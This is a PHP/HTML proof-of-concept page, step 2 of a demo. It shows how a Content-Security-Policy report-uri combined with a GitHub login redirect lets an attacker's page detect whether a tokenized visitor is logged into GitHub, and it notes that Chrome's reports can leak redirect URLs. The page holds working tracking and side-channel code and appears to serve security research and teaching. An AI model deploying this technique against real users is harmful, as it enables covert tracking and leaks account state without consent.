<?php
if (!isset($_GET['ip']) || !preg_match('~^[a-f0-9]{32}$~', $_GET['ip'])) {
	header('Location: step-1.php');
	echo "Wrong IP parameter";
	exit;
}

file_put_contents(
		__DIR__ . '/last-report.txt',
		date('Y-m-d H:i:s') . ": User with the IP ?ip=" . $_GET['ip'] . " is on step 2 page\n" .
		date('Y-m-d H:i:s') . ": If no csp-report appears below with this token, " .
		"then it means user is *not* logged in github\n" .
		date('Y-m-d H:i:s') . ": If a report appears below," .
		" then it means the user *is* logged into github\n",
		// I'll cap the file size to 100K
		filesize(__DIR__ . '/last-report.txt') < 1e5 ? FILE_APPEND : 0);

header("Content-Security-Policy:" .
		"default-src 'self' https://github.com;" .
		"report-uri /csp-receiver.php");
?>
<!DOCTYPE html>
<html lang="en">
	<head>
		<meta charset="utf-8"/>
		<title>CSP data exfiltration</title>
		<meta name="viewport" content="width=device-width,initial-scale=1.0"/>
		<script defer="defer" src="csp-poc.js"></script>
		<link rel="stylesheet" type="text/css" href="csp-poc.css"/>
	</head>
	<body>
		<h1>CSP data exfiltration</h1>
		<h2>Step 2</h2>
		<p>
			Now, you are on a tokenized page (so victim is identifiable by the attacker).<br/>
			This page holds the following <samp>Content-Security-Policy</samp> header:<br/>
			<samp>header("Content-Security-Policy:" .
					"default-src 'self' https://github.com;" .
					"report-uri /mdn/csp/exfiltrate-data-poc/csp-receiver.php");
			</samp><br/>
			This means that the browser will allow the current page to load any resource from
			<samp>https://github.com</samp> or from the attacker's origin (<samp>'self'</samp>),
			but browser will refuse to load anything else (like <samp>https://help.github.com</samp>).<br/>
		</p>
		<p>
			So, attacker puts an image below with the URL <samp>https://github.com/login?return_to=%2Fhelp</samp>.<br/>
			If user <strong>is logged</strong> into github, then this page will issue a redirection to
			<strong>another origin</strong> (<samp>https://help.github.com</samp>), which is <strong>not</strong>
			allowed by the attacker's CSP. So the browser will refuse to request this redirection,
			and it will send a report to the URL specified by <samp>report-uri</samp> directive.
			The body of the requets to this URL will contain the attacker's page URL (<samp>document-uri</samp>)
			with the victim's unique token so when the attacker receive such report, it means
			<strong>this user is logged into github</strong>.<br/>
			If user is <strong>not</strong> logged into github, then the <samp>https://github.com</samp>
			page will be loaded and browser will try to show it in image tag (and fail to, but we don't case).
			Since no CSP violation occured, browser will not send any report, so attacker will know user
			is <strong>not</strong> logged into github.
		</p>
		
		<h2>The (github) image</h2>
		<p>
			Github image is loaded below.
			Check you browser console to see CSP violation report requests.
		</p>
		<img src="https://github.com/login?return_to=%2Fhelp" alt="github picture (broken on purpose: we don't care)"/>
		
		<h2>Attacker's received report</h2>
		<p>
			For this POC, the attacker's received reports is accessible from <a href="last-report.txt">here</a>).
		</p>
		<output>Awaiting to receive report...</output>
		
		<h2>Browser-dependant infos</h2>
		<p>
			Another interesting thing is that browsers send different uris in the report:<br/>
			Firefox sends the original image's uri <samp>"blocked-uri": "https:\/\/github.com\/login?return_to=%2Fhelp"</samp>,
			meaning you're not able to leak a lot of data from the github's rediction itself<br/>
			But Chroms sends the <em>redirected</em> uri <samp>"blocked-uri": "https:\/\/help.github.com"</samp>,
			meaning that if your targeted website (here, github) shows important informations in the redirection URL
			(say, user's account name or email), then you could access this information too.
		</p>
		
		<p>
			<a href="step-1.php">← Back to step 1</a>
		</p>
	</body>
</html>
